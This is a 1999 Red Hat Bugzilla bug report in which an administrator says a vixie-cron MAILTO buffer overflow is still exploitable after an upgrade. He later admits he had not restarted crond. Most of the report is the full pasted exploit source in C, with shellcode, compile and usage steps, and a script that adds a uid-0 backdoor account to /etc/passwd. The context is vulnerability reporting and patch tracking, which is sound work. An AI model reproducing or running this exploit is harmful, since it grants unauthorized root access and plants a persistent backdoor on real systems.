Red Hat Bugzilla – Bug 5819
vixie cron exploit still works !
Last modified: 2008-05-01 11:37:52 EDT
'lo .. i tried the vixie cron exploit which came out on 08/25/1999, and it still works. normally this exploit should have been fixed with vixie-cron-3.0.1-37 , i installed upto 3.0.1-39 , and the buffer overflow still works. I tried this on several machines (all RH 6.0) with different kernels. (this also works on alpha) Please inform me ASAP about the progress on this bug (original exploit pasted below). Kind Regards, Dimitri Avgoustakis UNIX Administrator .. LIFE - The Linux Company exploit located on bugtraq : "http://www.securityfocus.com/data/vulnerabilities/exploits/ crontab_exploit.c" /* vixie-crontab-3.0.1 cron_popen() exploit by Akke - 30-8-99 Akke <c4c4@hehe.com> how to compile ? gcc crontab_exploit.c -o crontab_exploit how to use ? ./crontab_exploit crontab ./CrOn wait 1 minute crontab -r su -l cronexpl (password = exploited) (this is root account) Greets to: bugtraq */ #include <stdio.h> #include <stdlib.h> #include <string.h> char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb 0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x4 0\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/ce"; #define max_buf_len 1000 #define CronFile "CrOn" #define RootScript "/tmp/cron_root" #define CronEchoScript "/tmp/cron_echo" #define chmod_bin "/bin/chmod" int main() { char crontab_file_string[max_buf_len]; char temp[max_buf_len]; FILE *fp; int i; strcpy(temp, "T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w r i t t e n _ b y _ A K K E _ " "T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w r i t t e n _ b y _ A K K E _ " "_ _ _ _ _ _ _ _ _ _ _ _ _ _ "); sprintf(temp,"%s%s",temp,shellcode); sprintf(crontab_file_string,"MAILTO=%s\n",temp); strcat(crontab_file_string,"0"); for (i=1;i<60;i++) sprintf(crontab_file_string,"%s,%d",crontab_file_string,i); sprintf(temp," * * * * %s\n",CronEchoScript); strcat(crontab_file_string,temp); if ((fp = fopen(CronFile,"w+")) != NULL) { fprintf(fp,"%s",crontab_file_string); fclose(fp); } if ((fp = fopen(CronEchoScript,"w+")) != NULL) { fprintf(fp,"#!/bin/sh\necho Wrong window!"); fclose(fp); sprintf(temp,"%s 777 %s",chmod_bin,CronEchoScript); system(temp); } if ((fp = fopen(RootScript,"w+")) != NULL) { #define login "cronexpl" #define passw "1T8uqGnJZ0OsQ" /* "exploited" */ fprintf(fp,"#!/bin/sh\necho %s:%s:0:0::/root:/bin/bash >> /etc/passwd\nrm %s %s %s",login,passw,CronEchoScript,"/tmp/ce",RootScript); fclose(fp); sprintf(temp,"%s 777 %s",chmod_bin,RootScript); system(temp); } if ((fp = fopen("/tmp/ce","w+")) != NULL) { fprintf(fp,"#!/bin/sh\n%s\n",RootScript); fclose(fp); sprintf(temp,"%s 777 %s",chmod_bin,"/tmp/ce"); system(temp); } exit(0); }
RHSA-1999:030-01: vixie-cron crond MAILTO
dear redhat, i'm pleased to tell you i'm stupid .. i forgot to stop/start cond after upgrading .. my apollogies ;)